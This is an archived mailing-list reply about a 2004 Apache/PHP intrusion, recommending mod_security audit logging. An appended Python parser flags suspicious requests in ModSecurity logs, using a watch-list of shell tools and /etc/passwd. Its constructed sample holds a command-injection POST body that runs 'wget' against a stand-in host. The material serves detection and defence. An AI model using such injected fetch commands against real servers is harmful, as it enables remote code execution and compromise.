Security Incidents mailing list archives
RE: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)
From: "Bojan Zdrnja" <Bojan.Zdrnja () LSS hr>
Date: Sat, 10 Jul 2004 22:42:51 +1200
Nathan,
-----Original Message-----
From: nathan c. dickerson [mailto:nathan () pro net]
Sent: Saturday, 10 July 2004 6:16 a.m.
To: incidents () securityfocus com
Subject: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)

Greetings,

If I could get the full GET and POST request data, I could perform searches for interesting execution strings. Does anyone have any suggestions on this?

Whole thing sounds pretty interesting. Regarding post GET and POST requests, there's (obviously) no way to get them. But, in order to get those logs in the future, you can install mod_security module for Apache (http://www.modsecurity.org). Besides all the nice features that mod_security offers, one pretty interesting one is audit logging - it will log full details of every request (including POST requests), which will allow you later analysis.

If you have that many sites hosted on a machine (120?), my wild guess would be that they're getting in through one of the buggy PHP scripts - I saw far too many sites compromised because of bad PHP scripts.

In any case, it would be interesting to see more information about this.

Hope this helps.

Cheers,

Bojan Zdrnja
CISSP
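
The audit-log search discussed above, as an added example that is not part of the original post: a parser for ModSecurity's serial audit log that flags transactions whose request line or POST body contains execution-related strings. It assumes the section layout of the later ModSecurity 2.x serial format (`--id-A--` to `--id-Z--`, request headers in section B, request body in section C), which is not necessarily what the release available in 2004 wrote; the watch-list and the sample log are constructed.

```python
import re
from urllib.parse import unquote_plus

# Serial audit log boundary: --<transaction id>-<section letter>--
BOUNDARY = re.compile(r"^--([0-9a-fA-F]+)-([A-Z])--$")
# Constructed watch-list of execution-related strings; tune it per site.
SUSPICIOUS = re.compile(
    r"\b(wget|curl|uname|passthru|shell_exec)\b|/bin/(ba)?sh|/etc/passwd", re.I)

def parse_audit_log(text):
    """Split the log into one dict per transaction: {section letter: text}."""
    entries, current, section = [], None, None
    for line in text.splitlines():
        m = BOUNDARY.match(line)
        if m:
            letter = m.group(2)
            if letter == "A":            # section A opens a transaction
                current = {}
                entries.append(current)
            section = None if letter == "Z" else letter  # Z closes it
            if current is not None and section:
                current[section] = ""
        elif current is not None and section:
            current[section] += line + "\n"
    return entries

def find_suspicious(text):
    """Return (request line, matched strings) for each flagged transaction."""
    hits = []
    for entry in parse_audit_log(text):
        request_line = entry.get("B", "").split("\n", 1)[0]
        # B's first line carries the GET query string; C is the POST body.
        decoded = unquote_plus(request_line + "\n" + entry.get("C", ""))
        found = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(decoded)})
        if found:
            hits.append((request_line, found))
    return hits

# Constructed sample, trimmed to the sections used; ids and payloads are made up.
SAMPLE = """--0a1b2c3d-A--
--0a1b2c3d-B--
GET /index.php?id=7 HTTP/1.0
--0a1b2c3d-Z--
--0a1b2c3e-A--
--0a1b2c3e-B--
POST /forum/post.php HTTP/1.0
--0a1b2c3e-C--
subject=hi&cmd=uname+-a%3B+wget+http%3A%2F%2Fhost.invalid%2Ff
--0a1b2c3e-Z--
"""
```

Calling `find_suspicious(SAMPLE)` flags only the POST transaction, because the match is made on the URL-decoded body that a plain access log would never have recorded.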